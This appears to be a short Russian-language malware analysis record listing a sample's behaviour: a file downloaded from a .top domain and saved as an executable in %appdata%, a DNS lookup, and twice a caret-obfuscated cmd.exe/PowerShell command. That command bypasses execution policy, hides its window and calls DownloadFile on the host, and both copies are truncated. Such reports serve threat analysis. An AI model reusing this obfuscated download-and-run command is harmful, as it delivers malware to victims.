Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^w^E^r^Sh^E^l^l^.^e^XE -eXECut^IONpOL^I^Cy ^BYpA^sS ^-nOP^R^o^fILE -^W^indoW^sTyl^E h^Id^d^e^n (^nEW^-o^BjeCT ^sySte^m^.N^et.w^e^B^C^L^IeNT).DOwnLOadfiL^e('http://foo...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "P^O^w^E^r^Sh^E^l^l^.^e^XE -eXECut^IONpOL^I^Cy ^BYpA^sS ^-nOP^R^o^fILE -^W^indoW^sTyl^E h^Id^d^e^n (^nEW^-o^BjeCT ^sySte^m^.N^et.w^e^B^C^L^IeNT).DOwnLOadfiL^e('http://foo...' (со скрытым окном)